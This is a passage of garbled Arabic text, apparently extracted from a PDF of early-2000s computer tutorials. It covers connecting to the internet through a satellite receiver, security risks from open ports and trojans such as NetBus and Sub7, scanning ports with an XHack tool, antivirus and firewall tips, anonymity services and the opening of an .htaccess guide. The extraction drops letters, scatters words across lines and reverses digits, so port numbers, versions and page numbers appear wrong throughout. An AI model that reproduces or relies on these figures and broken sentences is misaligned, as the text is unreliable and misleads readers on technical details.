2 PS‬س‬ ‫ولیس‬ ‫‪                                                                        . SEREAL‬‬ ‫‪       LINK CABEL‬‬ ‫‪L‬‬ ‫أحضر كیبل ‪ UTB‬واشبكه بكرت الشبكة بالكمبیوتر ‪ ،‬وأحضر‬ ‫واشبك رأسه الول في مخرج ‪ SEREAL‬الموجود في الجھاز لديك ‪             .‬‬ ‫اذھ ب إلى اكسبلورر مرة أخرى واختر أدوات < خیارات انترنت < اتصالت < أزل‬ ‫ل‬ ‫‪                                        191‬‬ ‫‪     LAN‬‬ ‫‪L‬‬ ‫الملقم الوكیل < إعدادات ‪ LAN‬ثم اختر التصال عن طريق شبكة < (‬ ‫تطبیق < موافق < موافق ‪                                                    ..‬‬ ‫لقد انتھ یت الن من إعداد الكمبیوتر بقي إعداد الريسفر ‪                      ..‬‬ ‫الحلقة الثانیة ‪ :‬إعداد الريسفر ‪                                               ::‬‬ ‫تتأكد‪  ‬‬ ‫د‬ ‫أول يا شباب ھناك بعض الجھزة ل تعمل بھذه الخاصیة ‪ ،‬لذلك يجب أن‬ ‫على‪   ‬‬ ‫من التاجر الذي اشتريت منه ھ ذا الدش ‪ ،‬لكنني أقول لكم أنني جربته ى‬ ‫جھاز نوكیا ‪ 0089‬فعمل بكل طلقة وسلسة ‪ ،‬وكذلك على جھاز تكنوسات ‪   .‬‬ ‫أول ‪ :‬يفترض أن تكون قد برمجت القناة وفق ما ذكرنا في الجزاء السابقة ‪     ،،‬‬ ‫وھي جاھزة لديك الن ‪ ،،‬ألیس كذلك ‪                                        ..‬‬ ‫احضر كرت شبكة ‪ PCMCI‬وأدخله في فتحة أريدتو الموجوده في الجھاز واشبك‬ ‫ك‬ ‫بھا كیبل ‪ UTB‬القادم من جھاز الكمبیوتر ‪                                     .‬‬ ‫ر‪   ‬‬ ‫اشبك الرأس الثاني من كیبل ‪ LINK‬في القتحة الموجودة في جھاز الريسفر‬ ‫من الخلف ‪                                                                  ..‬‬ ‫عدا‪  ‬‬ ‫يجب أن يكون الكمبیوتر مستمرا في التشغیل لكن أطفيء جمیع البرامج ا‬ ‫ف‪    ‬‬ ‫صفحة ‪ MSN‬التي سبق فتحھا وتأكد أن برنامج الفیروسات وشاشة التوقف‬ ‫معطل‪                                                                 ‬‬ ‫ل‬ ‫بوضع‬ ‫‪                        INTERNET DATA‬‬ ‫‪I‬‬ ‫الن شغل الريسفر واذھب إلى قناة‬ ‫انتظر لمدة عشر دقائق تقريبا سیظھ ر لك برنامج التشغیل اتبع الخطوات التالیة‬ ‫ة‬ ‫‪                                                                             :‬‬ ‫‪                                                OK‬‬ ‫اختر ‪ INBUT‬واختر ‪ OK‬ثم ‪O .‬‬ ‫‪                         OK‬‬ ‫إذھب إلى ‪ UOTBUT‬واختر من القائمة ‪ PCMCI‬ثم ‪O‬‬ ‫ط‪   ‬‬ ‫اختر ‪ SEARCH‬وانتظر حتى ترى ‪ MSN‬أو ‪ MICROSOFT NETWORK‬ثم اضغط‬ ‫‪                                         OK‬‬ ‫علیھا ثم اختر ‪ OK‬ثم اختر ‪ ALL‬ثم ‪O‬‬ ‫انتظر بعدھ ا لمدة دقیقتین تقريبا ثم اذھ ب إلى الكمبیوتر واضغط أي رابطة على‬ ‫ى‬ ‫الصفحة وستجد أن النترنت تعمل لديك على أفضل ما يرام بدون ھاتف ‪       ..‬‬ ‫ملحظة ‪ ( :‬ستصلك النترنت بدون صوت إذا أردت وصول الصوت على الكمبیوتر‬ ‫ر‬ ‫محلت‪    ‬‬ ‫ت‬ ‫فتحتاج توصیلة من الريسفر إلى كرت الصوت بالجھاز وھي تباع لدى‬ ‫الصوتیات وأجھزة المساجد على شرط أن يكون كرت الصوت لديك ‪ 821‬بت) ‪ .‬‬ ‫البرنامج‪ ‬‬ ‫ج‬ ‫إذا كان الريسفر لديك ل يوجد به برنامج اتصال بالنترنت فیمكنك انزال‬ ‫الجديد حسب نوع جھازك من الموقع التالي ‪                                 ::‬‬ ‫‪                             http://quassi.virtualave.net/ipdvb2000.html‬‬ ‫‪                                     291‬‬ ‫المخاطر المنیة على شبكة الویب والوقایة منها(‪193                 )1‬‬ ‫الظامي‪                                                                                  ‬‬ ‫ي‬ ‫للكاتب‪ :‬حزم‬ ‫ندخل كل یوم إلى هذه الشبكه العنكبوتیه التي سخرها االله لنا فإما أن نقدر هذه النعمه ونؤتیها‪     ‬‬


‫حقه‬ ‫وسنخرها في مرضاة االله والدعوة الیه وخدمة دینه وإل أصبحت نقمة ووبا ً علینا ‪                 .‬‬ ‫ل‪                         ‬‬ ‫(((( وعن عمره فیما أفناه ))))‪                                                                       ‬‬ ‫=======================‪                                                             ‬‬ ‫=======================‪                                                             ‬‬ ‫عموما ندخل لموضوعنا وهو أننا حین ندخل إلى هذه الشبكة فیجب أن نكون على درایة بما نحن‪     ‬‬ ‫ه فهو عرضه للختراق والعتداء علیه من قبل‬ ‫مقدمون علیه ‪ ،‬فإن المستخدم إذا لم یكون حذًر ومتنب ً‬ ‫ا‪                                              ‬‬ ‫ا‬ ‫الهكرز والقراصنه عبر المنافذ التي یتسللون منها ‪                                                   .‬‬ ‫والمنفذ أو الـ (‪  (PORT‬هنا سوفت ویر حیث أننا على شبكة الویب بعیدین كل البعد عن منافذ‪       ‬‬ ‫الهاردویر‪                                                                                           .‬‬ ‫ومن باب الفائدة نتعرف على تعریف البورت من ناحیة الحاسب اللي ‪                              :‬‬ ‫فهو المنفذ أو الطرف أو المخرج وهذا المصطلح یرمز إلى القناة أو المدخل الطبیعي في‪     ‬‬ ‫الحاسب‬ ‫والذي یسمح للحاسب بالتصال بالجهزة الخرى ‪                                                  .‬‬ ‫ب سیكون المنفذ ‪1 COM‬أو ‪2. COM‬‬ ‫مثال ‪ :‬لدینا فاكس مودم خارجي ‪ . U.S ROBOTICS‬فغال ً‬ ‫ا‪                                      ‬‬ ‫وهذا منفذا محسوس ما علینا منه خووووووف ‪ .‬یعني هذا ما یتعلق بموضوع الهكرز الذي سنتطرق‪ ‬‬ ‫إلیه إنما ذكرته من باب الفائدة ‪                                                                      .‬‬ ‫أما إذا أردنا أن نعرف المنفذ الذي نقصده في اصطلح شبكة النترنت فیقصد به العنوان الذي‪ ‬‬ ‫ترسل‬ ‫علیه دفعات حزم البیانات ( ‪                                                          . (PACKETS‬‬ ‫وهذه المنافذ هي التي یتسلل منها القراصنه الى اجهزة مرتادي الشبكه ‪ .‬إذا ما وجدوا ثغرة تسمح‪ ‬‬ ‫لهم‬ ‫بذلك ‪                                                                                               .‬‬ ‫مثال ‪ :‬برنامج ‪ NETBUS‬ویتسلل به الهاكر الى جهاز ضحایاه عن طریق المنفذ ‪ 54321 :‬أو‪     ‬‬ ‫‪                                                                                            64321 .‬‬ ‫ج بین الشباب العرب وغالب الحادیث في المنتدیات منصبه‬ ‫أو برنامج السب سفن الذي لقي روا ً‬ ‫على‬ ‫ا‪                                                                 ‬‬ ‫هذا البرنامج الذي صنعه الهاكر موب مان ‪                                                           .‬‬ ‫ومنافذه كثیره ابرزها ‪ 1176 :‬أو ‪ 3421‬أو ‪ 9991‬وأشهر منافذه ‪                          . 47372‬‬ ‫والبرامج كثیرة ‪ .‬والمنافذ أكثر ‪                                                                     .‬‬ ‫‪                                                491‬‬ ‫سنحاول في المواضیع القادمة إلقاء الضوء قدر المستطاع على هذه النقاط ‪                          .‬‬ ‫حتى یكون المستخدم لهذه الشبكه على درایة بالبحر الذي یخوض فیه ‪                                 .‬‬ ‫ولحظ في الصورة الثانیه كشف لك بورت ‪                                                 ) 931 ( .‬‬ ‫یا اخون احذروا من هذا البورت لنه لئیم ویسمى بورت النت بیوس ‪                                  .‬‬ ‫والختراق عن طریق هذا البورت یتم في اكثر الحوال على الشبكات ‪                               .‬‬ ‫اي اشكالت راجعوا هذه الصفحه ‪                                                                     .‬‬ ‫‪                                                            http://www.7azm.8m.net/port.htm‬‬ ‫وهذا یعني أنك معرض للختراق في أي وقت وبأي طریقة كانت وقد یستهدفك أحد المخترقین (‪      ‬‬ ‫ب عن طریق عمل ‪ SCAN‬على أیبیات مزودي الخدمه‬ ‫ی كما یحصل غال ً‬ ‫الهاكرز ) لسبب ما أو عشوائ ً‬ ‫ا‪                                                        ‬‬ ‫ا‬ ‫‪                                                                                                        .‬‬ ‫وربما یكون هذا الهكرز خبیًر (‪  (expert‬فیمكنه اختراقك بحیث ل تشعر بما یفعله في نظامك وفي‪    ‬‬ ‫ا‪                                                                          ‬‬ ‫ملفاتك وخصوصیاتك ‪                                                                                  .‬‬ ‫لذلك أفضل طریقه هي عدم وضع أشیائك الهامة والخاصة داخل جهازك كرقم بطاقة الئتمان أو‪      ‬‬


‫أرقامك السریة ‪ ....‬الخ ‪                                                                                 ..‬‬ ‫وقد یرسل الهاكرز السیرفر والى ضحیته فإذا ما تم تشغیل سیرفر البرنامج مكن الهاكرز مخالبه‪   ‬‬ ‫ن‬ ‫من‬ ‫فریسته ‪                                                                                                 ..‬‬ ‫=======================‪                                                              ‬‬ ‫=======================‪                                                              ‬‬ ‫نقطه مهمة وعابره بعد ان تحدثنا عن النقاط السابقه ‪                                                   ::‬‬ ‫الفایروسات‪                      ‬‬ ‫ت‬ ‫كذلك یجب أن تتخذ أسالیب الحمایة الممكنة مثل برامج الحمایه من‬ ‫‪                                ( NORTON ANTI VIRUS‬‬ ‫(‬ ‫مثل برنامج النورتن انتي فایروس (‬ ‫وهو البرنامج الكثر شعبیه عند العرب مع أنه ل یروق لي كثیًر ‪                                     ..‬‬ ‫اا‪                                       ‬‬ ‫كذلك من برامج الحمایة من الفایروسات ( ‪ ) Trend PC­cillin 0002‬وأحب أن أنوه أن هذاا‪       ‬‬ ‫البرنامج ممتاز جد ً وانصح الشباب باستخدامه ‪                                                         ..‬‬ ‫اا‪                                                                                       ‬‬ ‫والحرص على تحدیثه دوریً ‪                                                                           ..‬‬ ‫اا‪                                                                             ‬‬ ‫وكذلك الفایرولت مثل الفایروال اللماني (‪ ( eSafe‬وهو جید إلى حد ما ‪                           .‬‬ ‫أو (‪ ( McAfee Firewall‬استخدمته وهو ممیز جدا ً‪                                                ‬‬ ‫والجدران الناریة مثل (‪  ( ZoneAlarm‬وغیرها من البرامج الخرى التي سنتطرق لها بتوسع إن شاءء‬ ‫االله في مواضیع قادمه بإذن االله ‪                                                                        ..‬‬ ‫‪                                                   591‬‬ ‫المخاطر المنیة على شبكة الویب والوقایة منها(‪              )2‬‬ ‫الظامي‪                                                                               ‬‬ ‫ي‬ ‫للكاتب‪ :‬حزم‬ ‫ا‬ ‫ع‬ ‫تبا‬ ‫ذكل‬ ‫نكمل‬ ‫عنها‬ ‫الكشف‬ ‫كیفیة‬ ‫وعن‬ ‫المنافذ‬ ‫وعن‬ ‫إكما ً لما سبق أن ذكرناه عن بعض المخاطر‬ ‫ً‬ ‫ل‬ ‫بهذا الموضوع ‪                                                                                   ..‬‬ ‫بالنترنت‪             ‬‬ ‫ت‬ ‫ملحظة هامة قبل البدأ بعملیة فحص جهازك أنه ینصح أن لتكون متص ً‬ ‫ل‪                       ‬‬ ‫ل‬ ‫‪                                                                           XHack‬‬ ‫‪X‬‬ ‫إسم البرنامج ‪:‬‬ ‫ممیزات عامة للبرنامج ‪                                                                           ::‬‬ ‫اسم‪                  ‬‬ ‫امكانیة كشف جمیع انواع ملفات التجسس وباي شكل كان وباي امتداد وباي م‬ ‫جهازك‪                          ‬‬ ‫ك‬ ‫امكانیة كشف البرنامج الذي یحاول الهكر الدخول بواسطتة الى‬ ‫له‪                                       ‬‬ ‫القدرة على فحص اي برنامج مع إعطاء معدل الشتباه ه‬ ‫الذاكرة‪                                                  ‬‬ ‫ة‬ ‫القدرة علىاغلق اي برنامج مخفي في‬ ‫الفعالة‪                                                    ‬‬ ‫ة‬ ‫القدرة على فحص ملفات التجسس غیر‬ ‫التسجیل‪                                  ‬‬ ‫ل‬ ‫اظهار الملفات الموجودة في قائمة التشغیل داخل ملف‬ ‫المخفیة‪                                                        ‬‬ ‫ة‬ ‫امكانیة اظهار جمیع النوافذ بمافیها‬ ‫نبدأ بشرح موجز الله وباالله التوفیق ‪                                                               ..‬‬ ‫الرحیم‪                                                                             ‬‬ ‫م‬ ‫بسم االله الرحمن‬ ‫البرنامج‪                                                                                    ‬‬ ‫ج‬ ‫واجهة‬ ‫االنتیجة‪                             ‬‬ ‫ة‬ ‫الن لضغط على رز أبد ً للبدأ بعملیة فحص المنافذ وانتظر‬ ‫اا‪                                                                         ‬‬ ‫الفحص‪                                                        ‬‬ ‫ص‬ ‫مثال للنتیجة التي تظهر بعد عملیة‬ ‫‪                                           691‬‬ ‫ولحظ ظهور هذا المنفذ ‪ 0005‬وهو منفذ خطیر وللمعلومیة فهو موجود بأي نظام ویندوز میلینیوم‪ ‬‬ ‫و‬ ‫أو‬ ‫ت‪                                     ‬‬ ‫‪ xp‬كذلك بل إن ویندوز ‪ xp‬به منافذ أكثر هدیة من مایكروسوفت‬ ‫‪                                                                         0005‬‬ ‫‪0‬‬ ‫ومبینة خطورة منفذ‬ ‫هذا المنفذ یستخدم بواسطة برنامج التجسس ‪ Bubbel‬وایضا برنامج ‪ Sockets de Troie‬یستطیع اي‬ ‫ي‬


‫شخص یمتكلك هذا البرنامج الدخول الى جهازك ورؤیة جمیع ملفاتك والتحكم في جمیع عملیاته‪      .‬‬ ‫وللمعاومیة فاسم الملف الذي یقوم بفتح هذا البورت هو ‪                         SSDPSRV.EXE‬‬ ‫موجود في مجلد‪ SYSTEM‬في الویندوز‪                                                           ‬‬ ‫ولعل بعض المنافذ ل یستطیع البرنامج ذكر وصف عنها إما لحداثتها أو لعدم المعرفة الكافیة عن‪  ‬‬ ‫هذا‬ ‫البورت ولعلنا نتعرض في دروس قائمة لتفصیلت عن البورتات یمكن الرجوع إلیها فحال وجود‪     ‬‬ ‫قصور في برامج كشف البورتات عن ذكر تفصیلت عنها‪                                            ‬‬ ‫الن الخطوة التالیة إضغط على زر تشغیل محرك الذكاء الصطناعي‪                                ‬‬ ‫سیظهر لك هذا التحذیر‪                                                                              ‬‬ ‫في حال تنفیذك للشروط أختر خیار جمیع الشروط قد نفذت أبدأ‪                                       ‬‬ ‫الن اختر زر جمع المعلومات وانتظر حتى ینتهي البرنامج من عملیة جمع المعلومات عن المنافذ‪     ‬‬ ‫المفتوحة والملفات المتسببة في ذلك ‪                                                                .‬‬ ‫ثم اضغط على زر إبدا التنفیذ لتظهر لك النتیجة‪                                                      ‬‬ ‫الن اختر زر حذف من التشغیل لحذف الملفات المتسببة في فتح المنافذة السابقة الذكر والتي‪   ‬‬ ‫ظهرت‬ ‫معنا بالصورة السابقة‪                                                                                ‬‬ ‫‪                                                 791‬‬ ‫الن یستحسن إعادة تشغیل جهازك وبعد إعادة التشغیل إعمل عملیة فحص مرة أخرى للتأكد من‬ ‫نجاح‬ ‫العملیة وبالتوفیق إن شاء االله ‪                                                             .‬‬ ‫وصلى االله وسلم وبارك على نبینا محمد وعلى آله وصحبه أجمعین‪                             ‬‬ ‫‪                                        891‬‬ ‫السریة في النترنت‪                                   ‬‬ ‫النترنت عبارة عن بحر مفتوح من عملیات الكومبیوتر وعلى ذلك فهي معرضة للكثیر من المخاطر‪ ‬‬ ‫المتعلقة بسریة المعلومات لذلك فبمجرد اتصالك بالنترنت فأنت معرض لعملیة الختراق وسرقة‪    ‬‬ ‫ی (أو بالحرى‪   ‬‬ ‫البیانات وبما أن النترنت لیس لها مالك او حاكم حتى هذه اللحظة وتدیر نفسها تلقائ ً‬ ‫ا‪              ‬‬ ‫نحن المستخدمین الذین ندیرها)؛ فیجب أن نعلم أنه إذا لم نستطع نحن سكان عالم النترنت أن‬ ‫نحكمها‬ ‫بعقلنیة فسیأتي الیوم الذي تتدخل الجهات الحكومیة لدارتها!‪                                      ‬‬ ‫مخاطر النترنت المحتملة‪                                                                       ‬‬ ‫سرقة المعلومات‪                                                                                ‬‬ ‫اعتراض رسائل البرید اللكتروني وقراءتها‪                                                     .‬‬ ‫اختراق أجهزة الغیر والطلع على المعلومات الموجودة فیها أو تغییرها‪                          .‬‬ ‫سرقة أرقام بطاقات الئتمان والرقام السریة الخرى‪                                              .‬‬ ‫تعطیل نظام التشغیل‪                                                                            ‬‬ ‫ارسال فیروسات تتسبب في اعطال أیً كانت‪                                                     .‬‬ ‫ا‪                                                             ‬‬ ‫مسح نظام التشغیل أو حذف ملفات نظام‪                                                          .‬‬ ‫وجود مواقع غیر مناسبة‪                                                                        ‬‬ ‫مواقع إباحیة‪                                                                                   .‬‬ ‫مواقع منافیة للدین‪                                                                             .‬‬ ‫مواقع وصفات صناعة متفجرات‪                                                                .‬‬ ‫‪                                               991‬‬ ‫أعداء النترنت‪                                                                                 ‬‬ ‫المتطفلون ‪                                                                           Hackers‬‬ ‫المتطفل هو الشخص الذي یشعر بالفخر لمعرفته بأسالیب عمل النظام أو الشبكات بحیث یسعى‬ ‫للدخول‬ ‫علیها بدون تصریح‪ ،‬وهؤلء الشخاص عاد ً ل یتسببون بأي أضرار مادیة‪                        .‬‬ ‫ة‪                                                    ‬‬


‫‪                                                                           Crackers‬‬ ‫‪C‬‬ ‫ن‬ ‫المخربون‬ ‫الشخاص‪     ‬‬ ‫ص‬ ‫المخرب هو الشخص الذي یحاول الدخول على أنظمة الكمبیوتر دون تصریح‪ ،‬وهؤلء‬ ‫المتطفلین‪                                              .‬‬ ‫‪.‬‬ ‫عاد ً ما یتسببون في أضرار مادیة بعكس‬ ‫ة‪                                                                                          ‬‬ ‫ة‬ ‫‪                                                                           Viruses‬‬ ‫‪V‬‬ ‫ت‬ ‫الفیروسات‬ ‫الفیروس هو برنامج یكرر نفسه على نظام الكمبیوتر عن طریق دمج نفسه في البرامج الخرى‪ ،‬‬ ‫ا‬ ‫وكما‬ ‫أن الفیروسات خطیرة للنسان لدرجة أنها قد تقضي علیه؛ فالفیروسات االتي نتحدث عنها قد‪   ‬‬ ‫ي‬ ‫تقضي‬ ‫س مثل‪      ‬‬ ‫على الكمبیوتر‪ ،‬وقد تأتي في مختلف الشكال والحجام بل أن بعضها ل یسمى فیرو ً‬ ‫د‬ ‫الدود‬ ‫اا‪                ‬‬ ‫‪Worms‬وأحصنة طروادة ‪ Trojan Horses‬وبعض الفیروسات لیست خطیرة وإنما مزعجة‪       ..‬‬ ‫الفیروسات‪                                                        ‬‬ ‫ت‬ ‫بعض التصرفات التي قد تجلب‬ ‫سلمتها‪                                     .‬‬ ‫‪.‬‬ ‫تشغیل البرامج من النترنت دون فحصها والتأكد من‬ ‫سلمتها‪                                      .‬‬ ‫‪.‬‬ ‫تشغیل البرامج من أقراص دون فحصها والتأكـد من‬ ‫المهمة‪                                                      .‬‬ ‫‪.‬‬ ‫عدم وضع نسخ احتیاطیة للمعلومات‬ ‫منه‪                                  .‬‬ ‫‪.‬‬ ‫عدم وجود مضاد جید للفیروسات أو عدم وجود نسخة جدیدة‬ ‫الفیروسات‪                                                                          ‬‬ ‫ت‬ ‫الحمایة من‬ ‫یجب أن ل تبالغ في إجراءات الحمایة ضد الفیروسات‪ ،‬كما یجب أل تتهاون فیها‪ ،‬بحیث ل إفراط ول‪  ‬‬ ‫‪N‬‬ ‫‪Norton AntiVirus‬‬ ‫تفریط ‪.‬المر المهم أن یكون لدیك برنامج مضاد فیروسات ممتاز كبرنامج ‪0.5‬‬ ‫ب‪   ‬‬ ‫وتأكد من تحدیثه بصورة دوریة من موقع الشركة المنتجة ‪ www.norton.com .‬اعتبر ‪ -‬من باب‬ ‫الحمایة ‪ -‬أن جمیع البرامج التي تنزلها من النترنت أو من القراص ملغومة بالفیروسات ولذلك‪    ‬‬ ‫م‬ ‫قم‬ ‫‪                                             002‬‬ ‫بفحصها قبل تشغیلها واعلم أن النظام الوحید المن ‪ %001‬هو المكتوب بالید أو المحفوظ في‪ ‬‬ ‫ة‬ ‫الذاكرة‬ ‫م بنسخ بدیلة للمعلومات المهمة ‪..‬وضع في ذهنك أن درهم وقایة خیر من قنطار علج‪   .‬‬ ‫واحتفظ دائ ً‬ ‫اا‪                                                                                    ‬‬ ‫‪                                                                             Spoofing‬‬ ‫‪S‬‬ ‫ة‬ ‫المحاكاة‬ ‫المحاكاة هو مصطلح یطلق على عملیة انتحال شخصیة للدخول الى النظام‪ .‬حزم الـ ‪ IP‬تحتوي‪  ‬‬ ‫ى‬ ‫على‬ ‫عناوین لل ُر ِل وال ُر َل إلیه وهذه العناوین ینظر إلیها على أنها عناوین مقبولة وساریة المفعول من‪ ‬‬ ‫س‪                                                                          ‬‬ ‫مس‬ ‫مس‬ ‫فإن‪   ‬‬ ‫قبل البرامج وأجهزة الشبكة‪ ،‬ومن خلل طریقة تعرف بمسارات المصدر ‪ Source Routing‬ن‬ ‫حزم الـ ‪ IP‬قد یتم إعطائها شك ً تبدو معه وكأنها قادمة من كمبیوتر معین بینما هي في الحقیقة‪ ‬‬ ‫ت‬ ‫لیست‬ ‫ل‪                                                                 ‬‬ ‫ل‬ ‫قادمة منه‪ ،‬وعلى ذلك فإن النظام إذا وثق ببساطة بالهویة التي یحملها عنوان مصدر الحزمة فإنه‬ ‫ن‬ ‫یكون‬ ‫بذلك قد حوكي ( ُ ِع)‪ .‬البرید اللكتروني یمكن أیض ً أن یخدع بسهولة ولكن النظام المؤمن بشكل‬ ‫د‬ ‫جید‬ ‫خد‪                                            ‬‬ ‫د‬ ‫ا‬ ‫‪          Source routed‬‬ ‫‪S‬‬ ‫م بالحركة المس ّرة من قبل المصدر‪.‬‬ ‫ل یثق بهذه المصادر ول یسمح عمو ً‬ ‫اا‪                                            ‬‬ ‫ی‬ ‫النترنت‪                                                              ‬‬ ‫ت‬ ‫بعض خیارات الحمایة في‬ ‫بالنترنت‪                                                                         .‬‬ ‫‪.‬‬ ‫عدم الرتباط‬ ‫‪                                                                   (Authentication‬‬ ‫(‬ ‫التوثیق‪(.‬‬ ‫‪                                                                         (Encryption‬‬ ‫(‬ ‫التشفیر‪(.‬‬ ‫‪                                                                      (Firewalls‬‬ ‫(‬ ‫جدران النار‪(.‬‬


‫‪                                            102‬‬ ‫ی في النترنت؟‪                ‬‬ ‫هل یمكن أن تتجول متخف ً‬ ‫ا‪                                 ‬‬ ‫الجواب نعم ول‪ ،‬وإلیكم القصة‪                                                            ‬‬ ‫توجد على شبكة إنترنت عدة مواقع تؤمن لك سریة تحركاتك‪ .‬فموقع‪                         ‬‬ ‫‪                                                          )(www.anonymizer.com‬‬ ‫مث ً‪ ،‬یوفر لك من خلل خدمة إمكانیة إخفاء رقم البي عن المواقع التى ترغب في ل‪           ‬‬ ‫زیارته‪                                                                                 ،‬‬ ‫ویوصلك إلیه‪ ،‬بدون أن یم ّنه من تسجیل أي معلومات حقیقیة عنك‪ ،‬حیث سیبدو للموقع‪     ‬‬ ‫ك‪                                                              ‬‬ ‫ی‪       ،‬‬ ‫الذي تزوره‪ ،‬أنك قادم من عنون اخر وتقدم هذه الخدمة إما مجا ً‬ ‫ن بسرعة بطیئة نسب ً‬ ‫ا‪        ‬‬ ‫ا‬ ‫ض‪ ،‬إمكانیة إخفاء‪        ‬‬ ‫أو بمقابل مع سرعة جیدة‪ ،‬ومزایا أفضل خدمات ویوفر الموقع‪ ،‬أی ً‬ ‫ا‪                       ‬‬ ‫هویتك عن مزود ‪ .‬إنترنت‪ ،‬الذي تشترك لدیه‪ ،‬من خلل خدمة اخر یعود تصرفاتك على‪    ‬‬ ‫الشبكة‪ ،‬باستخدام تقنیات تشفیر متطورة (‪ 821‬بت)‪ ،‬فل ‪ .‬تش ّر هذه الخدمة‪ ،‬كل مزود‪      ‬‬ ‫ف‪                              ‬‬ ‫الخدمة‪ ،‬قادًر على معرفة أسماء المواقع التي تزورها‪ ،‬أو الكلمات التي تبحث عنها‪         ،‬‬ ‫ا‪                                                                            ‬‬ ‫ض‪ ،‬سریة إرسال رسائل البرید اللكتروني‪ ،‬والدردشة عبر إنترنت‪             .‬‬ ‫وتضمن‪ ،‬أی ً‬ ‫ا‪                                                                          ‬‬ ‫موقع آخر شهیر في هذا المجال‪ ،‬ننصحك بزیارته‪ ،‬هو‪                                     ‬‬ ‫‪                                                )(www.ultimate­anonymity.com‬‬ ‫د‪ ،‬تبلغ ‪ 41‬دولًر‪ ،‬تدفع مرة واحدة فقط‪            .‬‬ ‫یقدم هذا الموقع خدماته بأسعار زهیدة ج ً‬ ‫ا‪                                 ‬‬ ‫ا‬ ‫وتوفر بعض البرمجیات المجانیة‪ ،‬مثل‪                                                    ‬‬ ‫‪                                                                          Ghost Mail‬‬ ‫إمكانیة إرسال رسائل إلكترونیة بدون الكشف عن عنوان البي‪                              ‬‬ ‫الخاص بالكمبیوتر المتصل‪ .‬تستطیع جلب البرنامج من الموقع‪                              ‬‬ ‫‪                                       )(www.er.uqam.ca/merlin/fg591543/gm‬‬ ‫هل یضمن الشتراك بالخدمات المذكورة‪ ،‬إخفاء هویتك‪ ،‬بشكل كامل‪ ،‬وأنت تبحر في إنترنت؟‬ ‫ل‪ ،‬فالجهة الوسیطة‪ ،‬التي تقدم لك هذه الخدمات‪ ،‬تحتفظ بسجل عن كافة تحركاتك‪ ،‬لكنها‪    ‬‬ ‫ل تكشفه‪ ،‬إل في حال وقع اعتداء معین‪ ،‬مصدره الكمبیوتر التي تستخدمه‪ ،‬كأن ترسل‪       ‬‬ ‫رسائل تهدید إلى الخرین‪ ،‬أو قنابل بریدیة‪ ،‬أو تقوم بتصرفات أخرى تخالف القوانین‪        ‬‬ ‫المریكیة‪ ،‬وهي البلد الذي توجد فیه تلك الجهات‪                                          ‬‬ ‫تسمح الخدمات السابقة‪ ،‬بتصفح المواقع التي یمنعها "البروكسي"‪ ،‬ویحتمل‪ ،‬لهذا السبب‪    ،‬‬ ‫أن یمنع بعض مزودي خدمات إنترنت في البلدان العربیة‪ ،‬الوصول إلى المواقع التي تقدم‪   ‬‬ ‫مثل هذه الخدمات ‪                                                                       .‬‬ ‫‪                                      202‬‬ ‫ملف ‪                                htaccess‬‬ ‫للكاتب‪                                                                       BSD­r00t:‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪                                      ‬‬ ‫| * مقدمـــة‪                                                                              ‬‬ ‫| * اهمیة ملف ‪                                                                htaccess.‬‬ ‫| * كیفیة عمل ملف ‪                                                           htaccess.‬‬ ‫| * عمل صفحات ‪ error‬خاصة‪                                                           ‬‬ ‫| * منع عرض محتویات المجلد الذي ل یوجد به ‪                                    index‬‬ ‫| * منع‪/‬اتاحة دخول الموقع لشخاص معینة‪                                               ‬‬ ‫| * تحویل من یحاول فتح لینك للینك اخر‪                                                   ‬‬ ‫| * عمل الملف ‪                                                              .htpasswd‬‬


‫| *الحمایة بواسطه ‪                                                            htaccess.‬‬ ‫| * منع اظهار الملف ‪                                                         htaccess.‬‬ ‫| * اضافة مستخدمین في الملف‪                                                           ‬‬ ‫| * جعل الصفحات تظهر بامتداد اخر‪                                                      ‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪                                      ‬‬ ‫* مقدمـــة‪                                                                                ‬‬ ‫­­­­­­­­­­­­‪                                                                             ‬‬ ‫من اهم وسائل حمایة المواقع و اغلق بعض الجزاء فیه بكلمة سر ‪ ,‬و منع بعض الناس من دخل‬ ‫الموقع و السماح‪                                                                          ‬‬ ‫لغیرهم بالدخول ‪ ..‬هو استخدام الملف ‪  htaccess.‬و الذي یمكن عمل الكثیر و الكثیر به ‪      .‬‬ ‫و هذا الملف مخفي و محمي بكلمة سر‪                                                     ‬‬ ‫* اهمیة ملف ‪                                                                  htaccess.‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­‪                                                                  ‬‬ ‫‪ -1‬حمایة اي جزء فیه بكملة سر‪                                                           ‬‬ ‫‪ -2‬عمل صفحات ‪ error‬خاصة بك‪                                                       ‬‬ ‫‪ -3‬منع عرض محتویات المجلد الذي ل یوجد به ‪                                    index‬‬ ‫‪ -4‬منع‪/‬اتاحة دخول الموقع لشخاص معینة‪                                                ‬‬ ‫‪ -5‬جعل صفحة البدایة بأمتدادات غیر ‪                                     .. html , .asp.‬‬ ‫‪ -6‬تحویل من یحاول فتح لینك للینك اخر‪                                                   ‬‬ ‫‪                                        302‬‬ ‫* كیفیة عمل ملف ‪                                                                     htaccess.‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­‪                                                                       ‬‬ ‫یمكنك عمل هذا الملف بواسطه اي محرر نصوص مثل النوت باد "‪ "Notepad‬عن طریق عمل‪    ‬‬ ‫للملف حفظ باسم و نحفظ‪                                                                           ‬‬ ‫الملف بهذا السم ‪ htacces.‬على ان یكون لیس امتداده ‪ txt.‬اي ان لیس هناك اسم للملف ‪ ,‬اذا‪      ‬‬ ‫لم‬ ‫تستطیع ذلك‪                                                                                        ‬‬ ‫احفظ الملف باسم "‪ ­ "htaccess.‬علمتي التنصیص في اسم الملف ‪                             . -‬‬ ‫* عمل صفحات ‪ error‬خاصة‪                                                                     ‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­‪                                                                          ‬‬ ‫و الفائدة منها هو ان الموقع یظهر بشكل افضل كما انه عند محاولة اي شخص عمل سكان على‬ ‫الموقع‬ ‫سوف یظهر كان‪                                                                                   ‬‬ ‫الموقع به كل الثغرات و ذلك لن طریقة عمل السكانر هي انه یقوم بتطبیق كل ثغره على الموقع‪   ‬‬ ‫و‬ ‫یرصد النتیجه‪                                                                                      ‬‬ ‫فاذا كان هناك اي تغیر یظهر لك كأن الموقع علیه هذه الثغره ‪                                       .‬‬ ‫و یمكنك عمل صفحات ال ‪ error‬الخاصه ك عن طریق ‪                                          -:‬‬ ‫أ‪ 